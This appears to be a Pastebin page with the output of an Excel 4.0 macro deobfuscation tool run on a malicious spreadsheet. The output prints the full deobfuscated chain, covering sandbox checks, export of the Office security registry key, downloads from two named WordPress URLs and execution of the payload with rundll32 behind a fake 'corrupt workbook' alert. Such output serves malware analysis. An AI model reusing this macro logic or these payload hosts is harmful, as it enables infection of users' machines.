Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\d42c62adb7559c60809dfa51d53e64b6a0a400408afbf3aef8fd7bde2367ef1c
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\d42c62adb7559c60809dfa51d53e64b6a0a400408afbf3aef8fd7bde2367ef1c
- [Loading Cells]
- auto_open: auto_openxp6og->tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!$CS$23836
- [Starting Deobfuscation]
- CELL:CS23836 , FullEvaluation , FORMULA(26,FW19305)
- CELL:CS23837 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AI46959)
- CELL:AI46959 , FullEvaluation , FORMULA(-368,ED10392)
- CELL:AI46960 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IM26282)
- CELL:IM26282 , FullEvaluation , FORMULA(-301,EG8350)
- CELL:IM26283 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HD24619)
- CELL:HD24619 , FullEvaluation , FORMULA(648,FU10914)
- CELL:HD24620 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DV49385)
- CELL:DV49385 , FullEvaluation , FORMULA(638.4,W48406)
- CELL:DV49386 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IJ54262)
- CELL:IJ54262 , FullEvaluation , FORMULA(47,AD21470)
- CELL:IJ54263 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AQ28036)
- CELL:AQ28036 , FullEvaluation , FORMULA(-436,BQ37930)
- CELL:AQ28037 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AU15874)
- CELL:AU15874 , FullEvaluation , FORMULA(-117,BL21938)
- CELL:AU15875 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BM56647)
- CELL:BM56647 , FullEvaluation , FORMULA(-190,IS58563)
- CELL:BM56648 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GH13183)
- CELL:GH13183 , FullEvaluation , FORMULA(216,FH48629)
- CELL:GH13184 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EN65022)
- CELL:EN65022 , FullEvaluation , FORMULA(-88,BO51056)
- CELL:EN65023 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HI20419)
- CELL:HI20419 , FullEvaluation , FORMULA(-268,AM7352)
- CELL:HI20420 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IT33849)
- CELL:IT33849 , FullEvaluation , FORMULA(-28,IK31173)
- CELL:IT33850 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HX33694)
- CELL:HX33694 , FullEvaluation , FORMULA(336,FD63424)
- CELL:HX33695 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IE30187)
- CELL:IE30187 , FullEvaluation , FORMULA(467,CI151)
- CELL:IE30188 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!P25229)
- CELL:P25229 , FullEvaluation , FORMULA(-255,B22727)
- CELL:P25230 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BI16974)
- CELL:BI16974 , FullEvaluation , FORMULA(306.25,DE61562)
- CELL:BI16975 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BV36285)
- CELL:BV36285 , FullEvaluation , FORMULA(-134,CO58518)
- CELL:BV36286 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER25619)
- CELL:ER25619 , FullEvaluation , FORMULA(-425,GR31095)
- CELL:ER25620 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER915)
- CELL:ER915 , FullEvaluation , FORMULA(-1487.5,GT50980)
- CELL:ER916 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DP31417)
- CELL:DP31417 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",BS5069)
- CELL:DP31418 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ES64418)
- CELL:ES64418 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",FU20485)
- CELL:ES64419 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FR29556)
- CELL:FR29556 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",CI55856)
- CELL:FR29557 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BX28478)
- CELL:BX28478 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",Y2223)
- CELL:BX28479 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GX30254)
- CELL:GX30254 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",EM52673)
- CELL:GX30255 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IT24175)
- CELL:IT24175 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",AB46814)
- CELL:IT24176 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HF59100)
- CELL:HF59100 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",GP56392)
- CELL:HF59101 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DS12421)
- CELL:DS12421 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",AR61812)
- CELL:DS12422 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IR45905)
- CELL:IR45905 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",AV30811)
- CELL:IR45906 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GM39944)
- CELL:GM39944 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",DB2735)
- CELL:GM39945 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FQ5201)
- CELL:FQ5201 , FullEvaluation , FORMULA("=""C:\Users\Public\ziZqqH.reg""",DX8859)
- CELL:FQ5202 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BI51976)
- CELL:BI51976 , FullEvaluation , FORMULA("=R[2345]C[97]&GET.WORKSPACE(2)&""\Excel\Security ""&R[8469]C[119]&"" /y""",I390)
- CELL:BI51977 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!K17837)
- CELL:K17837 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",FR11386)
- CELL:K17838 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!J48104)
- CELL:J48104 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-11476]C[52],R[-22472]C[-113],0,5)",DR22862)
- CELL:J48105 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EZ12513)
- CELL:EZ12513 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-18644]C[104])))",X27503)
- CELL:EZ12514 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EW11228)
- CELL:EW11228 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",X27504)
- CELL:EW11229 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FY9357)
- CELL:FY9357 , FullEvaluation , FORMULA("=NEXT()",X27505)
- CELL:FY9358 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CP4135)
- CELL:CP4135 , FullEvaluation , FORMULA("=""http://theislandmen.com/wp-smart.php""",HX58157)
- CELL:CP4136 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AT21116)
- CELL:AT21116 , FullEvaluation , FORMULA("=""http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php""",BM58324)
- CELL:AT21117 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CN34881)
- CELL:CN34881 , FullEvaluation , FORMULA("=FOPEN(R[-46897]C[-36])",FH55756)
- CELL:CN34882 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HG32718)
- CELL:HG32718 , FullEvaluation , FORMULA("=FPOS(R[35378]C[48],215)",DL20378)
- CELL:HG32719 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HJ24458)
- CELL:HJ24458 , FullEvaluation , FORMULA("=FREAD(R[27967]C[-61],255)",HQ27789)
- CELL:HJ24459 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HI43987)
- CELL:HI43987 , FullEvaluation , FORMULA("=FCLOSE(R[5666]C[89])",BW50090)
- CELL:HI43988 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!T25103)
- CELL:T25103 , FullEvaluation , FORMULA("=FILE.DELETE(R[-41985]C[-81])",HA50844)
- CELL:T25104 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FE48429)
- CELL:FE48429 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-6267]C[186])),CLOSE(FALSE),)",AM34056)
- CELL:FE48430 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BB19811)
- CELL:BB19811 , FullEvaluation , FORMULA("=""C:\Users\Public\NqSfY7Fd.html""",AR22886)
- CELL:BB19812 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!N57229)
- CELL:N57229 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[50489]C[35],R[17519]C[-8],0,0)",AZ5367)
- CELL:N57230 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GL59066)
- CELL:GL59066 , FullEvaluation , FORMULA("=FILES(R[-11938]C[-94])",EH34824)
- CELL:GL59067 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FJ46055)
- CELL:FJ46055 , FullEvaluation , FORMULA("=IF(ISERROR(R[-27988]C[91]),CLOSE(FALSE),)",AU62812)
- CELL:FJ46056 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IS17943)
- CELL:IS17943 , FullEvaluation , FORMULA("=""C:\Users\Public\gGCUNF.html""",F60085)
- CELL:IS17944 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FL45824)
- CELL:FL45824 , FullEvaluation , FORMULA("=R[24675]C[-102]&"",DllRegisterServer""",DD35410)
- CELL:FL45825 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AS4957)
- CELL:AS4957 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[9307]C[66],R[11235]C[-160],0,0)",FJ48850)
- CELL:AS4958 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EL13627)
- CELL:EL13627 , FullEvaluation , FORMULA("=FILES(R[-1444]C[-97])",CY61529)
- CELL:EL13628 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AX22261)
- CELL:AX22261 , FullEvaluation , FORMULA("=IF(ISERROR(R[45285]C[82]),,RUN(R[-12028]C[59]))",U16244)
- CELL:AX22262 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EI25186)
- CELL:EI25186 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[30088]C[-70],R[31849]C[-129],0,0)",EE28236)
- CELL:EI25187 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FS37429)
- CELL:FS37429 , FullEvaluation , FORMULA("=ALERT(R[853]C[-9],2)",CB4216)
- CELL:FS37430 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DJ33074)
- CELL:DJ33074 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-40976]C[-14],R[-26051]C[-83],0,5)",GI61461)
- CELL:DJ33075 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!R26591)
- CELL:R26591 , FullEvaluation , FORMULA("=CLOSE(FALSE)",ER20868)
- CELL:R26592 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BS5069)
- CELL:BS5069 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:BS5070 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FU20485)
- CELL:FU20485 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:FU20486 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CI55856)
- CELL:CI55856 , FullEvaluation , "https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
- CELL:CI55857 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!Y2223)
- CELL:Y2223 , PartialEvaluation , APP.MAXIMIZE()
- CELL:Y2224 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EM52673)
- CELL:EM52673 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
- CELL:EM52674 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AB46814)
- CELL:AB46814 , FullEvaluation , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
- CELL:AB46815 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GP56392)
- CELL:GP56392 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
- CELL:GP56393 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AR61812)
- CELL:AR61812 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
- CELL:AR61813 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AV30811)
- CELL:AV30811 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
- CELL:AV30811 , FullEvaluation , [TRUE]
- CELL:AV30812 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DB2735)
- CELL:DB2735 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
- CELL:DB2736 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DX8859)
- CELL:DX8859 , FullEvaluation , "C:\Users\Public\ziZqqH.reg"
- CELL:DX8860 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!I390)
- CELL:I390 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\ziZqqH.reg /y"
- CELL:I391 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FR11386)
- CELL:FR11386 , FullEvaluation , "C:\Windows\system32\reg.exe"
- CELL:FR11387 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DR22862)
- CELL:DR22862 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\ziZqqH.reg /y",0,5)
- CELL:DR22863 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!X27503)
- CELL:X27503 , PartialEvaluation , WHILE(ISERROR(FILES(R[-18644]C[104])))
- CELL:X27506 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HX58157)
- CELL:HX58157 , FullEvaluation , "http://theislandmen.com/wp-smart.php"
- CELL:HX58158 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BM58324)
- CELL:BM58324 , FullEvaluation , "http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php"
- CELL:BM58325 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FH55756)
- CELL:FH55756 , PartialEvaluation , FOPEN("C:\Users\Public\ziZqqH.reg")
- CELL:FH55757 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DL20378)
- CELL:DL20378 , PartialEvaluation , FPOS("FOPEN(""C:\Users\Public\ziZqqH.reg"")",215)
- CELL:DL20379 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HQ27789)
- CELL:HQ27789 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\ziZqqH.reg"")",255)
- CELL:HQ27790 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BW50090)
- CELL:BW50090 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\ziZqqH.reg"")")
- CELL:BW50091 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HA50844)
- CELL:HA50844 , PartialEvaluation , FILE.DELETE("C:\Users\Public\ziZqqH.reg")
- CELL:HA50845 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AM34056)
- CELL:AM34056 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[-6267]C[186])),CLOSE(FALSE),)
- CELL:AM34056 , End , [TRUE] CLOSE(FALSE)
- CELL:AM34056 , FullEvaluation , [FALSE]
- CELL:AM34057 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AR22886)
- CELL:AR22886 , FullEvaluation , "C:\Users\Public\NqSfY7Fd.html"
- CELL:AR22887 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AZ5367)
- CELL:AZ5367 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\NqSfY7Fd.html",0,0)
- CELL:AZ5368 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EH34824)
- CELL:EH34824 , PartialEvaluation , FILES("C:\Users\Public\NqSfY7Fd.html")
- CELL:EH34825 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AU62812)
- CELL:AU62812 , FullBranching , IF(ISERROR(R[-27988]C[91]),CLOSE(FALSE),)
- CELL:AU62812 , End , [TRUE] CLOSE(FALSE)
- CELL:AU62812 , FullEvaluation , [FALSE]
- CELL:AU62813 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!F60085)
- CELL:F60085 , FullEvaluation , "C:\Users\Public\gGCUNF.html"
- CELL:F60086 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DD35410)
- CELL:DD35410 , FullEvaluation , "C:\Users\Public\gGCUNF.html,DllRegisterServer"
- CELL:DD35411 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FJ48850)
- CELL:FJ48850 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://theislandmen.com/wp-smart.php","C:\Users\Public\gGCUNF.html",0,0)
- CELL:FJ48851 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CY61529)
- CELL:CY61529 , PartialEvaluation , FILES("C:\Users\Public\gGCUNF.html")
- CELL:CY61530 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!U16244)
- CELL:U16244 , FullBranching , IF(ISERROR(R[45285]C[82]),,RUN(R[-12028]C[59]))
- CELL:U16244 , FullEvaluation , [TRUE]
- CELL:U16245 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EE28236)
- CELL:EE28236 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php","C:\Users\Public\gGCUNF.html",0,0)
- CELL:EE28237 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CB4216)
- CELL:CB4216 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
- CELL:CB4217 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GI61461)
- CELL:GI61461 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\gGCUNF.html,DllRegisterServer",0,5)
- CELL:GI61462 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER20868)
- CELL:ER20868 , End , CLOSE(FALSE)
- CELL:U16244 , FullEvaluation , [FALSE] RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CB4216)
- CELL:CB4216 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
- CELL:CB4217 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GI61461)
- CELL:GI61461 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\gGCUNF.html,DllRegisterServer",0,5)
- CELL:GI61462 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER20868)
- CELL:ER20868 , End , CLOSE(FALSE)
- CELL:AV30811 , End , [FALSE] CLOSE(TRUE)
- [Day of Month] 4
- [END of Deobfuscation]
- time elapsed: 2.736368179321289
- Process finished with exit code 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement